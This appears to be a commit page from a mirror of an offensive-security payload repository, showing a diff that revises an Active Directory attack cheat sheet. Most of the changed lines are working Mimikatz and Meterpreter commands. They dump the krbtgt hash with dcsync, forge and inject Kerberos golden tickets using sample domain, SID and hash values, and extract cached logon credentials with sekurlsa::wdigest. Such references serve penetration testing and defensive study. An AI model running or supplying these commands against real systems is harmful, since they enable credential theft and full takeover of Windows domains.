mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Fix Golden Ticket
This commit is contained in:
parent
b8fbca3347
commit
f62d466340
@ -45,25 +45,30 @@
|
||||
Metasploit : windows/gather/credentials/domain_hashdump
|
||||
```
|
||||
* Golden Tickets
|
||||
Mimikatz version
|
||||
```c
|
||||
Get info - Mimikatz
|
||||
lsadump::dcsync /user:krbtgt
|
||||
lsadump::lsa /inject /name:krbtgt
|
||||
|
||||
Get info - Meterpreter(kiwi)
|
||||
dcsync_ntlm krbtgt
|
||||
|
||||
Forge a Golden ticket - Mimikatz
|
||||
kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
|
||||
kerberos::tgt
|
||||
```
|
||||
|
||||
Forge a Golden ticket - Metasploit
|
||||
post/windows/escalate/golden_ticket
|
||||
Meterpreter version
|
||||
```c
|
||||
Get info - Meterpreter(kiwi)
|
||||
dcsync_ntlm krbtgt
|
||||
dcsync krbtgt
|
||||
|
||||
Forge a Golden ticket - Meterpreter
|
||||
load kiwi
|
||||
golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>
|
||||
golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
|
||||
kerberos_ticket_purge
|
||||
kerberos_ticket_use /root/Downloads/pentestlabuser.tck
|
||||
kerberos_ticket_list
|
||||
```
|
||||
* Kerberoast
|
||||
```c
|
||||
@ -87,6 +92,7 @@
|
||||
```
|
||||
load mimikatz
|
||||
mimikatz_command -f sekurlsa::logonPasswords full
|
||||
mimikatz_command -f sekurlsa::wdigest
|
||||
```
|
||||
|
||||
## PowerSploit
|
||||
|
@ -13,6 +13,7 @@ Mimikatz console (multiple commands)
|
||||
PS C:\temp\mimikatz> .\mimikatz
|
||||
mimikatz # privilege::debug
|
||||
mimikatz # sekurlsa::logonpasswords
|
||||
mimikatz # sekurlsa::wdigest
|
||||
```
|
||||
|
||||
Mimikatz Golden ticket
|
||||
|
Loading…
Reference in New Issue
Block a user